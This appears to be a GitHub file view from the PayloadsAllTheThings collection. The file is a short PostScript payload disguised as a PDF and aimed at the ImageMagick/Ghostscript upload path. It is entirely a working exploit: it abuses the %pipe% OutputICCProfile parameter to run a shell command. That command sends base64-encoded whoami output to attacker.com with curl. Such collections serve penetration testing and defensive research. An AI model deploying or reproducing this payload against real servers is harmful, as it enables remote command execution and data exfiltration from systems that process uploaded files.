PayloadsAllTheThings/Upload Insecure Files/Picture Image Magik/imagemagik_ghostscript_cmd_exec.pdf

4 lines
130 B
Text
Raw Normal View History

2019-11-11 19:31:07 +00:00
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64) )
.putdeviceparams
quit